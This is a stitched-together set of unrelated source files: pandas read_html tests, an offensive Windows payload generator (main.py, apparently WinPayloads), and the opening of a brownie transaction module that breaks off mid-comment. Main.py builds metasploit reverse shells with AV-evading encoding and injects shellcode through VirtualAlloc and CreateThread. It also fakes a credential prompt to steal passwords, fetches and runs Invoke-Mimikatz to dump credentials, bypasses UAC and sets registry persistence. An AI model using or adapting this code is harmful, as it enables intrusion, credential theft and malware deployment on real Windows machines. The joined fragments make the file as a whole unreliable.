df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
with tm.assert_raises_regex(ValueError,
r'\(you passed a negative value\)'):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html, )[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile(object):
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super(ErrorThread, self).run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
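# Quick manual sketch (not collected by pytest) of the call pattern exercised
# throughout this class: read_html returns a list of DataFrames, one per
# matching <table> element, e.g.
#
#     read_html("<table><tr><th>A</th></tr><tr><td>1</td></tr></table>")[0]
#
# The tests above simply route this call through self.read_html so that both
# the 'bs4' and 'lxml' flavors are exercised.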
|
main.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import socket
import re
import subprocess
import struct
import sys
import blessed
import random
import SimpleHTTPServer
import SocketServer
import multiprocessing
from Crypto.Cipher import AES
import base64
import string
import glob
import readline
import time
import psexec
import urllib2
from collections import OrderedDict
import asyncore
import ssl
import threading
import prompt_toolkit
from prompt_toolkit.contrib.completers import WordCompleter
import netifaces
t = blessed.Terminal()
helpDict = {
'1' : '- Generates a metasploit reverse tcp shell.',
'2' : '- Generates a metasploit reverse tcp meterpreter shell.',
'3' : '- Generates a metasploit bind tcp meterpreter shell.',
'4' : '- Generates a metasploit reverse HTTPS meterpreter shell.',
'5' : '- Generates a metasploit reverse meterpreter shell with DNS.',
'6' : '- Generates a custom payload from user input (shellcode)',
    'stager' : '- Produces a small base64 encoded powershell one-liner that can be used for metasploit payloads and the powershell menu.'\
    ' It is small enough to fit in a windows run prompt and can be used with a ducky for quick exploitation.\n'\
    '- After a connection has been made, you can select any metasploit payload and it will give you the option to execute the'\
    ' payload over the powershell stager (without touching disk), which therefore improves AV evasion.\n'\
    '- Stagers can be used in reverse (preferred) or bind TCP and traffic is encrypted.',
    'sandbox' : '- Select anti-sandboxing techniques for use in metasploit payloads and stager payloads.\n'\
    '- Values in [] are default values; when generating a payload, user input will be taken.',
    'persistence' : '- After the payload executes, a registry key will be added and the powershell payload will '\
    'be saved on the file system as $env:USERPROFILE/update.txt. Upon boot, the payload will execute.',
    'uacbypass' : '- Will try to bypass UAC on users that run as local admin. If the bypass is successful, two shells should return'\
    ' and one of them will be running as local administrator.',
    'allchecks' : '- After a meterpreter connection, AllChecks.ps1 will execute, giving the user possible ways to escalate privileges.',
'interface' : '- This menu allows you to select the default interface for WinPayloads to use for all network tasks',
'cleanup' : '- Will remove all .exe in the default payload directory',
    'clients' : '- This is the client menu. You will only be able to access this after receiving a stager connection.\n'\
    '- A client connection can be made by using the stager menu option.',
    'ps' : '- This is the powershell scripts menu; it can only be accessed after receiving a stager connection.\n'\
'- Payloads in this menu will be directly executed over the stager connection.'
}
def sandboxChoose(choice):
from menu import sandboxMenuOptions, getAndRunSandboxMenu
if sandboxMenuOptions[choice]['availablemodules']:
sandboxMenuOptions[choice]['availablemodules'] = None
else:
sandboxMenuOptions[choice]['availablemodules'] = {str('ON'): ''}
return "clear"
def payloaddir():
return os.path.expanduser('~') + '/winpayloads'
def msfvenomGeneration(payload, ip, port):
p = subprocess.Popen(['msfvenom', '-p', payload, 'LHOST=' + str(ip), 'LPORT=' + str(port), '-f', 'python', '-e', 'x86/shikata_ga_nai'], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
LOADING = Spinner('Generating Shellcode')
    while p.poll() is None:
LOADING.Update()
time.sleep(0.2)
print '\r',
sys.stdout.flush()
payload = p.stdout.read()
compPayload = re.findall(r'"(.*?)"', payload)
return ''.join(map(str, compPayload))
def getHelp(*helpItem):
    helpItem = ''.join(helpItem)
    if helpItem in helpDict:
        return helpDict[helpItem]
    else:
        return t.bold_red + '[!] Enter a valid menu option to receive help'
class HANDLER(SimpleHTTPServer.SimpleHTTPRequestHandler):  # patch the HTTP server so it does not log every request
def log_message(self, format, *args):
return
class InterfaceSelecta():
def __init__(self):
self.num = 0
self.interfaces = []
self.interface = None
self.defaultInterfaceName = None
try:
self.defaultInterfaceName = netifaces.gateways()['default'][netifaces.AF_INET][1]
except KeyError:
pass
for interface in netifaces.interfaces():
self.num += 1
if self.defaultInterfaceName == interface:
isdefault = True
else:
isdefault = False
try:
self.interfaces += [{'num': self.num, 'interface': interface, 'addr': netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr'], 'default': isdefault}]
except:
pass
        # Prefer the interface that holds the default route; otherwise fall
        # back to the first interface that was successfully detected.
        for interface in self.interfaces:
            if interface['default']:
                self.interface = interface
        if not self.interface and self.interfaces:
            self.interface = self.interfaces[0]
def ChooseInterface(self, set=False):
if set:
for i in self.interfaces:
if self.interface == i:
currentinterface = t.bold_green + ' *'
else:
currentinterface = ''
print t.bold_yellow + str(i['num']) + ': ' + t.normal + i['addr'] + ' (' + i['interface'] + ')' + currentinterface
while True:
            interinput = prompt_toolkit.prompt("Interface > ", completer=WordCompleter([str(i['num']) for i in self.interfaces]), style=prompt_toolkit.styles.style_from_dict({prompt_toolkit.token.Token: '#FFCC66'}))
for i in self.interfaces:
if interinput == str(i['num']):
self.interface = i
return self.interface
return self.interface
class SHELLCODE(object):
@staticmethod
def windows_rev_shell(ip, port):
return msfvenomGeneration('windows/shell_reverse_tcp', ip, port)
@staticmethod
def windows_met_rev_shell(ip, port):
return msfvenomGeneration('windows/meterpreter/reverse_tcp', ip, port)
@staticmethod
def windows_met_bind_shell(ip, port):
return msfvenomGeneration('windows/meterpreter/bind_tcp', ip, port)
@staticmethod
def windows_met_rev_https_shell(ip, port):
return msfvenomGeneration('windows/meterpreter/reverse_https', ip, port)
@staticmethod
def windows_met_rev_shell_dns(ip, port):
return msfvenomGeneration('windows/meterpreter/reverse_tcp_dns', ip, port)
@staticmethod
def windows_custom_shellcode():
customshell = ''
print 'Paste custom shellcode below\nType \'END\' when done.'
while True:
buildstr = raw_input().rstrip()
if buildstr == 'END':
break
else:
customshell += buildstr
return customshell
@staticmethod
def windows_ps_ask_creds_tcp():
return (
"$ErrorActionPreference=\'SilentlyContinue\';Add-Type -assemblyname system.DirectoryServices.accountmanagement;"
"$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine);"
"$domainDN = \'LDAP://\' + ([ADSI]\'\').distinguishedName;"
"$credential = $host.ui.PromptForCredential(\'Credentials are required to perform this operation!\', \'\', \'\', \'\');"
"if($credential){$creds = $credential.GetNetworkCredential();$user = $creds.username;$pass = $creds.password;"
"echo \' INCORRECT:\'$user\':\'$pass;"
"$authlocal = $DS.ValidateCredentials($user, $pass);"
"$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass);"
"if(($authlocal -eq $true) -or ($authdomain.name -ne $null)){"
"echo \' CORRECT:\'$user\':\'$pass}}")
@staticmethod
def windows_invoke_mimikatz():
return (
"IEX (New-Object Net.WebClient).DownloadString(\\\"http://%s:%s/Invoke-Mimikatz.ps1\\\");"
"Invoke-Mimikatz -DumpCreds")
@staticmethod
def windows_uac_bypass():
return (
"IEX (New-Object Net.WebClient).DownloadString(\\\"http://%s:%s/Invoke-SilentCleanUpBypass.ps1\\\");"
"Invoke-SilentCleanUpBypass -Command \\\"powershell.exe -c %s\\\"")
injectwindows = """
shellcode = bytearray('%s')
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
bufe = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),bufe,ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
"""
class FUNCTIONS(object):
def powershellShellcodeLayout(self,powershellExec):
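        # Reformats msfvenom-style shellcode text ('\x31\xc0...') into the
        # comma separated '0x31,0xc0,...' layout expected by the powershell
        # templates, e.g. '\xfc\xe8' becomes '0xfc,0xe8,'.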
powershellShellcode = re.sub(r'\\x', '0x', powershellExec)
count = 0
newpayloadlayout = ''
for char in powershellShellcode:
count += 1
newpayloadlayout += char
if count == 4:
newpayloadlayout += ','
count = 0
return newpayloadlayout
def ServePayload(self, payloaddirectory, IP, port):
try:
os.chdir(payloaddirectory)
httpd = SocketServer.TCPServer((IP, port), HANDLER)
httpd.serve_forever()
except KeyboardInterrupt:
pass
except:
print t.bold_red + '\n[*] Port in use' + t.normal
def DoServe(self, IP, payloadname, payloaddir, port, printIt):
if printIt:
print t.bold_green + "\n[*] Serving Payload On http://%s:%s/%s.exe" % (IP, port, payloadname) + t.normal
a = multiprocessing.Process(
target=self.ServePayload, args=(payloaddir, IP, port))
a.daemon = True
a.start()
def randomUnusedPort(self):
from menu import returnIP
s = socket.socket()
s.bind((returnIP(), 0))
port = s.getsockname()[1]
s.close()
return port
def stagePowershellCode(self, powershellFileContents, port):
from menu import returnIP
DIR = 'stager'
if not os.path.isdir(DIR):
os.mkdir(DIR)
os.chdir(DIR)
with open('stage.ps1','w') as psFile:
psFile.write(powershellFileContents)
httpd = SocketServer.TCPServer((returnIP(), port), HANDLER)
httpd.handle_request()
os.chdir('..')
import shutil
shutil.rmtree(DIR)
class Spinner(object):
def __init__(self,text):
self.spinner = [
["|", "\\", "-", "/"],
["▁","▃","▄","▅","▆","▇","█","▇","▆","▅","▄","▃"],
["◡◡", "⊙⊙", "◠◠"],
["◐","◓","◑","◒"],
["▉","▊","▋","▌","▍","▎","▏","▎","▍","▌","▋","▊","▉"],
[".","o","O","@","*"],
["◴","◷","◶","◵"],
["▖","▘","▝","▗"],
["←","↖","↑","↗","→","↘","↓","↙"],
["█▒▒▒▒▒▒","██▒▒▒▒▒","███▒▒▒▒","████▒▒▒","█████▒▒","██████▒","███████"],
["◢","◣","◤","◥"],
["( ● )", "( ● )", "( ● )", "( ● )", "( ●)", "( ● )", "( ● )", "( ● )", "( ● )", "(● )"]
]
self.loading = list(text)
self.randomchoice = random.choice(self.spinner)
self.spin_1 = len(self.randomchoice)
self.spin_2 = len(self.loading) + 1
self.x = 0
def Looper(self, text):
print t.bold_green,
sys.stdout.write('\r')
sys.stdout.write(text)
print t.normal,
sys.stdout.flush()
def Update(self):
self.spin_2mod = self.x % self.spin_2
self.Looper(self.randomchoice[self.x % self.spin_1] + " " + "".join(
self.loading[0: (self.spin_2mod)]) + (" " * (self.spin_2 - self.spin_2mod)))
self.x += 1
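# Usage sketch for Spinner (the same pattern as msfvenomGeneration above);
# 'work_is_running()' is only a placeholder condition:
#
#     spin = Spinner('Doing work')
#     while work_is_running():
#         spin.Update()
#         time.sleep(0.2)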
|
transaction.py
|
#!/usr/bin/python3
import functools
import sys
import threading
import time
from collections import OrderedDict
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import RPCRequestError
from brownie.project import build
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import _decode_logs, _decode_trace
from .web3 import web3
def trace_property(fn: Callable) -> Any:
    # attributes that are only available after querying the transaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status == -1:
return None
if self._trace_exc is not None:
raise self._trace_exc
return fn(self)
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
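# Example (sketch) of how the two decorators above behave on a receipt object;
# 'txid' is a placeholder hexstring and 'call_trace' merely stands in for any
# @trace_inspection-wrapped method:
#
#     tx = TransactionReceipt(txid)
#     tx.return_value      # None while the tx is pending (status == -1);
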